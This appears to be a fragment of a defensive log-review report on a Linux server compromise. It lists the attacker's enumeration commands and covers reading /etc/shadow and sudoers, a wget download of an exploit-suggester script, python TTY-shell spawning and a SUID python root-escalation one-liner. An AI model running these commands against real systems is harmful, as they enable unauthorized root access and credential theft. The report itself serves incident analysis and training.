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</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> CH-15148-Defensive-Linux-Server-Logs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10-29-2022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review of the Linux server bash logs revealed an attacker was able to exploit the security features of this system using enumeration techniques, ultimately achieving privilege elevation.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of Findings:</w:t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enumeration techniques (and command line examples from the reviewed logs) were employed by the attacker in order to gain system root privileges and bypass configured security measures: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Information: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Available directories and system configuration details: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-ahlR /root/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-ahlR /home/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~/.bashrc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Programs and packages currently installed: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/ -name perl*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/ -name python*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dpkg -l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 configuration settings, such as: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 addresses and configurations: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ifconfig -a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/etc/network/interfaces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/etc/sysconfig/network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Networking details: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/etc/resolv.conf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iptables -L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lsof -i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 Permissions and Privileges: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 user information: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whoami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/etc/passwd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~/.bashrc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~/.profile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Privileged access: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 root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/ -name gcc*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/ -name cc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/etc/sudoers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-l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~/.ssh/authorized_keys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/etc/shadow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ls -alh /usr/bin/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ls -aRl /etc/| awk '$1 ~ /^.*r.*/'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ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2&gt;/dev/null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Services, Jobs, and Tasks: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services or jobs are currently running/scheduled to be run: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crontab -l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ps -aux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ps -ef | grep root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the aforementioned CLI commands, the attacker was able to escalate his/her permissions within the Linux system, ultimately spawning a TTY shell and gaining root access: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TTY shell spawned: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Specific commands used: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-c 'import pty; pty.spawn("/bin/sh")'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os.system('/bin/bash')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Installing exploit suggester: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0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wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh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executable/writable bash scripts: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/ -type f -user root -perm -4000 2&gt;/dev/null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./usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'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